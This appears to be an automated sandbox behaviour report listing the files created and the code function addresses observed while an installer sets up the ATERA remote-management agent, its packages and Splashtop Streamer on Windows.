                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA7C1.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA8AC.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAC76.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIADBF.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICA70.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICA80.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICB4C.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBAB.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\692c50.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\692c50.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID178.tmpJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\System.Management.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\CustomAction.configJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\System.Management.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\CustomAction.configJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\System.Management.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\CustomAction.configJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\CustomAction.config
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSTRemote.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMonitoring.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageUpgradeAgent.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageInternalPoller.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageProgramManagement.exe.log
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\CustomAction.config
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\CustomAction.config
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSystemTools.exe.log
                                Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI2D79.tmpJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_070700404_3_07070040
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_049750B85_3_049750B8
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_049759A85_3_049759A8
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_04974D685_3_04974D68
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 12_2_00007FFD9B37C92212_2_00007FFD9B37C922
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 12_2_00007FFD9B37BB7612_2_00007FFD9B37BB76
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 12_2_00007FFD9B370C1D12_2_00007FFD9B370C1D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B380C5813_2_00007FFD9B380C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B391CE013_2_00007FFD9B391CE0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B39C36D13_2_00007FFD9B39C36D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B389AF213_2_00007FFD9B389AF2
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B391D4813_2_00007FFD9B391D48
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B59F5C713_2_00007FFD9B59F5C7
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B5A501813_2_00007FFD9B5A5018
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B59DFF213_2_00007FFD9B59DFF2
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_071B71D016_3_071B71D0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_071B004016_3_071B0040
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B37836220_2_00007FFD9B378362
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B38C8BF20_2_00007FFD9B38C8BF
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B3775B620_2_00007FFD9B3775B6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B37BC4020_2_00007FFD9B37BC40
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B3712FB20_2_00007FFD9B3712FB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B3906C620_2_00007FFD9B3906C6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B39836221_2_00007FFD9B398362
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3975B621_2_00007FFD9B3975B6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B39BC4021_2_00007FFD9B39BC40
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3912FA21_2_00007FFD9B3912FA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3B06C621_2_00007FFD9B3B06C6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 24_2_00007FFD9B3612FB24_2_00007FFD9B3612FB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B3ACDF826_2_00007FFD9B3ACDF8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B381D7826_2_00007FFD9B381D78
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B381D1026_2_00007FFD9B381D10
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B589C9C26_2_00007FFD9B589C9C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B5978F026_2_00007FFD9B5978F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B5978F026_2_00007FFD9B5978F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3AC36229_2_00007FFD9B3AC362
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3A933229_2_00007FFD9B3A9332
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3BDAFA29_2_00007FFD9B3BDAFA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3A12FB29_2_00007FFD9B3A12FB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3AD25C29_2_00007FFD9B3AD25C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3BF72829_2_00007FFD9B3BF728
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3A070029_2_00007FFD9B3A0700
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3BF59D29_2_00007FFD9B3BF59D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3A858629_2_00007FFD9B3A8586
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3B5B7F29_2_00007FFD9B3B5B7F
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3C018829_2_00007FFD9B3C0188
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3A388F29_2_00007FFD9B3A388F
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B3766D833_2_00007FFD9B3766D8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B38174D33_2_00007FFD9B38174D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B392CA033_2_00007FFD9B392CA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B3884C033_2_00007FFD9B3884C0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B391C2633_2_00007FFD9B391C26
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B38528833_2_00007FFD9B385288
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE51696035_2_00007FFDEE516960
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE5120E035_2_00007FFDEE5120E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE5201E035_2_00007FFDEE5201E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE46B88035_2_00007FFDEE46B880
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3ECEA835_2_00007FFDEE3ECEA8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE40CE7035_2_00007FFDEE40CE70
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE42AFB035_2_00007FFDEE42AFB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE47EFD035_2_00007FFDEE47EFD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F2F8C35_2_00007FFDEE3F2F8C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE42902035_2_00007FFDEE429020
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE42ACD035_2_00007FFDEE42ACD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F6CC035_2_00007FFDEE3F6CC0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE514C8035_2_00007FFDEE514C80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE466D2035_2_00007FFDEE466D20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4A8D2035_2_00007FFDEE4A8D20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE530D3035_2_00007FFDEE530D30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE454D0035_2_00007FFDEE454D00
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E4DB435_2_00007FFDEE3E4DB4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE51CD6035_2_00007FFDEE51CD60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE440E3035_2_00007FFDEE440E30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4AAA7035_2_00007FFDEE4AAA70
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE428A6035_2_00007FFDEE428A60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE406A8035_2_00007FFDEE406A80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE45CB5035_2_00007FFDEE45CB50
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4CAB0035_2_00007FFDEE4CAB00
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE438B9035_2_00007FFDEE438B90
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE48CC0035_2_00007FFDEE48CC00
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4388A035_2_00007FFDEE4388A0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E28C035_2_00007FFDEE3E28C0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F886035_2_00007FFDEE3F8860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4A686035_2_00007FFDEE4A6860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4D691035_2_00007FFDEE4D6910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE43E99035_2_00007FFDEE43E990
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E8A3C35_2_00007FFDEE3E8A3C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE51C68035_2_00007FFDEE51C680
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3FE72035_2_00007FFDEE3FE720
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F273835_2_00007FFDEE3F2738
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE47A7E035_2_00007FFDEE47A7E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3EE80C35_2_00007FFDEE3EE80C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4464A035_2_00007FFDEE4464A0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F44DC35_2_00007FFDEE3F44DC
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3EA52435_2_00007FFDEE3EA524
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE46455035_2_00007FFDEE464550
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE43051035_2_00007FFDEE430510
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE49A5D035_2_00007FFDEE49A5D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE5005D035_2_00007FFDEE5005D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE51E5B035_2_00007FFDEE51E5B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E85D435_2_00007FFDEE3E85D4
